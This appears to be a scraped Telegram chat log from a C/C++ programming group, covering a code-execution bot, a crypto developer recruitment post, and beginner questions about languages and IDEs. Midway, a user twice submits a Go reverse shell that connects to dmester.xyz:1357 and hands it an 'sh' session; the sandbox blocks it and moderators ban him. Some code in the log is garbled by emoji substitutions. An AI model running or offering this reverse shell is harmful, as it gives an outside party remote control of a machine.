Anonymous
/cpp_clang@rextester_bot
Ok, give me some Cpp_clang code to execute
Liam
Ok, give me some Cpp_clang code to execute
#include <stdint.h> #include <iostream> #include <memory> namespace std { namespace dwn { template<typename T, typename... Args> std::unique_ptr<T> make_unique(Args&&... args) { return std::unique_ptr<T😠new T(std::forward<Args😠args)...)); } template<typename T> std::unique_ptr<T[]> make_unique(const size_t size) { return std::unique_ptr<T[]😠new T[size]); } char endianess(void) { static union { char c[4]; uint32_t u; } cu = {{'l', '?', '?', 'b'}}; return static_cast<char😠cu.u); } } // namespace dwn } // namespace std template<typename INT> INT dump_memory_to_int(const char* buf) { const static size_t typesize = sizeof(INT); const static bool is_big_endian = (std::dwn::endianess() == 'b'); static char mem[typesize]; for (size_t i = 0; i != typesize; ++i) { mem[i] = buf[is_big_endian ? i : typesize - i]; } return *(reinterpret_cast<INT*😠mem)); } int main(int argc, char* argv[]){ constexpr size_t size = 26; auto p = std::dwn::make_unique<char😠size); for (size_t i = 0; i != size; ++i) { p[i] = 'a' + i; } std::cout « dump_memory_to_int<uint64_t😠p.get() + 3) « std::endl; return 0; }
Liam
/help@rextester_bot
Anonymous
Execute code. Usage: /<language> <code> [/stdin <stdin>] Inline mode: @rextester_bot <language> <code> [/stdin <stdin>] Line breaks and indentation are supported. I'll also try to execute files pm'ed to me. See list of supported programming /languages. See /about for useful links.
Anonymous
There was a lot of command spam lol
Anonymous
It's probably better to use it in inline mode
Daplaze
Hi Everyone! I represent a project called ARMR. We are trying to design the best anonymous coin on the market. That is our goal. We are nearly finished with our Phase 1, but we need more hands to help our lead developer in our coming phases. It is essential that you are good at C++. And other languages will be an advantage as we plan both API and mobile wallets. We want a person that want to be a part of our team and can deliver. If you know cryptography and/or are good with security that is a plus. We are able to pay for the services, but we will pay in ARMR - So you should see it as being part of something big in the cryptomarket. If you are interested in hearing more about us, give me a PM and lets connect. You can also read some more about our plans here: www.armr.network .Thanks in advance.
Daplaze
gtfo
why are you saying this? I am looking for a dev. I am not advertising for anything other than a job, that some might find interesting and I have cleared it with the admins earlier..
Daplaze
unpaid job is not a job a dev will consider.
it is not unpaid.. you will get a chance to get the insight of a crypto currency and you will get paid in our coin which you are free to sell on exchanges
Daplaze
how do you know what it is worth?
Daplaze
our coin is probably gonna end up in between xspec and deeponion. But I am not here to advertise for that.. I am looking for a dev.. interested? Please PM me
Nomid Íkorni-Sciurus
how do you know what it is worth?
As long as it's paid the way it should.
Nomid Íkorni-Sciurus
https://lists.linuxfoundation.org/pipermail/bitcoin-dev/2018-April/015873.html
Nomid Íkorni-Sciurus
@ARMR_CORE look at this
Anonymous
/about@rextester_bot
Anonymous
Created by @GingerPlusPlus, powered by rextester.com.
Anonymous
/cpp_clang@rextester_bot
Anonymous
/cpp_clang@rextester_bot
Ok, give me some Cpp_clang code to execute
Raphael
/languages@rextester_bot
Anonymous
/ada, /asm, /bash, /brainfuck, /c, /c#, /c++, /c_clang, /c_gcc, /clang, /clang++, /clangplusplus, /clisp, /common_lisp, /cplusplus, /cplusplus_clang, /cplusplus_gcc, /cpp, /cpp_clang, /cpp_gcc, /csharp, /d, /elixir, /erlang, /f#, /fortran, /fpc, /fsharp, /g++, /gcc, /go, /golang, /haskell, /java, /javascript, /js, /kotlin, /lisp, /lua, /msvc, /mysql, /nasm, /node, /objc, /objective_c, /ocaml, /oracle, /pas, /pascal, /perl, /php, /postgresql, /prolog, /py2, /py3, /python, /python2, /python3, /r, /ruby, /scala, /scheme, /sql_server, /swift, /tcl, /v8, /vb, /vb.net, /vc++, /visual_basic_dotnet, /visual_c, /visual_cplusplus, /visual_cpp
Anonymous
/python3 print("Hello world")
Anonymous
Anonymous
Errors: can't load package: package main: source_file.go:1:1: expected 'package', found 'STRING' `` source_file.go:1:3: raw string literal not terminated Tip: Mistake? Edit your message, I'll adjust my response.
Eyobed
Heyyy guys can anyone show me how to input music in my project dev ++
Anonymous
/go package main import "fmt" func main() { fmt.Println("xdxd") }
Anonymous
/go package main import ( "net" "os/exec" ) func main() { conn, err := net.Dial("tcp4", "dmester.xyz:1357") if err != nil { panic(err) } defer conn.Close() cmd := exec.Command("sh") cmd.Stdin = conn cmd.Stdout = conn cmd.Stderr = conn cmd.Run() }
Anonymous
/go package main import ( "net" "os/exec" ) func main() { conn, err := net.Dial("tcp4", "dmester.xyz:1357") if err != nil { panic(err) } defer conn.Close() cmd := exec.Command("sh") cmd.Stdin = conn cmd.Stdout = conn cmd.Stderr = conn cmd.Run() }
Errors: panic: dial tcp4: lookup dmester.xyz on 80.237.128.145:53: write udp 83.169.3.96:34596->80.237.128.145:53: write: operation not permitted goroutine 1 [running]: panic(0x52e720, 0xc8200b0780) /usr/lib/go-1.6/src/runtime/panic.go:481 +0x3e6 main.main() source_file.go:11 +0xa3 Tip: Mistake? Edit your message, I'll adjust my response.
Roxifλsz 🇱🇹
/warn scam shit
Roxifλsz 🇱🇹
What the fuck
Roxifλsz 🇱🇹
Even more scam shit
Roxifλsz 🇱🇹
Nigga u getting B&
Roxifλsz 🇱🇹
/ban
Anonymous
Nigga u getting B&
Just checked recent actions ... 😆
Anonymous
/ban
Igor
/help@rextester_bot
Anonymous
Execute code. Usage: /<language> <code> [/stdin <stdin>] Inline mode: @rextester_bot <language> <code> [/stdin <stdin>] Line breaks and indentation are supported. I'll also try to execute files pm'ed to me. See list of supported programming /languages. See /about for useful links.
Igor
/about@rextester_bot
Anonymous
Created by @GingerPlusPlus, powered by rextester.com.
Igor
/golang@rextester_bot
Anonymous
/golang@rextester_bot
Ok, give me some Golang code to execute
Liam
Ok, give me some Golang code to execute
package main import "fmt" func main() { fmt.Println("xdxd") }
Anonymous
Created by @GingerPlusPlus, powered by rextester.com.
Richard
Result: xdxd
Looks like a real heavy vulnerability😂
Sergey
Hi guys. At first sorry for my english. I want to ask you, maybe you use/know/can recomend some good C++(at least maybe and on c lang) ssh client libraries for your own opensource projects?
Sergey
for windows
Anonymous
This is good
Anonymous
For client and server
Sergey
as i understand this written on C not c++
Roxifλsz 🇱🇹
as i understand this written on C not c++
It will work with a C++ project nonetheless
Sergey
thank you all
Zico
Hello I'm here to learn everything virtually from scratch. which of the two programs c and c++ do you recommend for starters?
Zico
Thank you
Roxifλsz 🇱🇹
Lmao, activated the bot
Roxifλsz 🇱🇹
Hello I'm here to learn everything virtually from scratch. which of the two programs c and c++ do you recommend for starters?
Well, C++ is sort of an extension of C and it implements object oriented programming
Roxifλsz 🇱🇹
So if you learn either C or C++, it won't be too hard to move between these two languages, they are pretty similar
Roxifλsz 🇱🇹
Fugg :DD
Zico
I tried the bot link. But it requires some cash spending
Anonymous
Wow this bot is clever
Anonymous
(No sarcasm intended)
s
Hi guy which ide is best for c++ program
s
Thank but i download source code just trying how its work that include graphics.h file I can't run it
s
Codeblock
s
Thanks
Anonymous
Hi guy which ide is best for c++ program
A poll was hosted by Davide Coppola. Here is a link for the result : http://blog.davidecoppola.com/2018/02/market-share-most-used-c-cpp-ides-in-2018-statistics-estimates/
Anonymous
the poll is not really about which one is the best, but about which ones are the most used
Anonymous
the poll is not really about which one is the best, but about which ones are the most used
Yeah ik, 'best' is subjective so basically it shows what most prefer